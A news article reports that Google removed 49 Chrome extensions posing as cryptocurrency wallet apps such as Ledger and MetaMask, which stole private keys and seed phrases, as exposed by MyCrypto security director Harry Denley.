Follow Us

Google Removed Malicious Chrome Extensions Mimicking Cryptocurrency Wallet Apps

Share on facebook
Share on twitter
Share on linkedin

Share

Google Removed Malicious cryptocurrency wallet Chrome Extensions
Share on facebook
Share on twitter
Share on linkedin
  • Google has removed 49 Chrome extensions from its Web Store that pretends an authorized cryptocurrency wallet apps but carries malicious code that stole crypto-wallet private keys, prompt phrases, and other core secrets.
  • However, all the 49 extensions perform the same action just a difference of branding which depends upon the user they are targeting.
  • These malicious extensions work almost in the same manner as the original ones.

Recently, the master blaster of search engine Google has removed 49 Chrome extensions from its Web Store that pretends an authorized cryptocurrency wallet apps but carries malicious code that stole crypto-wallet private keys, prompt phrases, and other core secrets.

Malicious Cryptocurrency Wallet Extensions Work almost Same as the Original Ones

Director of Security at the MyCrypto platform Harry Denley was the person who exposed 49 extensions. As per him, the 49 extensions look as if uploaded by the same person or group and it is assumed that a Russian-based threat actor is behind the curtains.

However, all the 49 extensions perform the same action just a difference of branding which depends upon the user they are targeting.

Adding to this Denley stated the identified malicious extensions pretending the known crypto wallets apps like Ledger, Electrum, Jaxx, MetaMask, KeepKey, and many more. These malicious extensions work almost in the same manner as the original ones.

Any information entered by the user during the configuration process is sent to one of the attacker’s servers or a Google Form. Moreover, the malicious activity doesn’t take place in the account at the same time for a test purpose, Denley entered the credentials of a test account into one of the malicious extensions, but still, the funds were not stolen.

The attacker takes interest in stealing funds from high-value accounts

Denley predicts that the attacker takes interest in stealing funds from high-value accounts only, or it may be possible that he is not aware of how to automate the thefts and accesses every single account manually.

Denley has joined some incidents reported by victims of some of the 49 extensions which he has been recently tracing. Though, the victims do not recover from any stolen funds yet. Furthermore, it is expected that other malicious extensions are going to rise in the Web Store in the coming months.

The researcher is appealing the victims to file reports if they believe they are facing issues of wallet hacks and lost funds due to their Chrome extensions.

Leave a Reply

Your email address will not be published. Required fields are marked *

Download our App for getting faster updates at your fingertips.

en_badge_web_generic.b07819ff-300x116-1

We Recommend

Top Rated Cryptocurrency Exchange

-
00:00
00:00
Update Required Flash plugin
-
00:00
00:00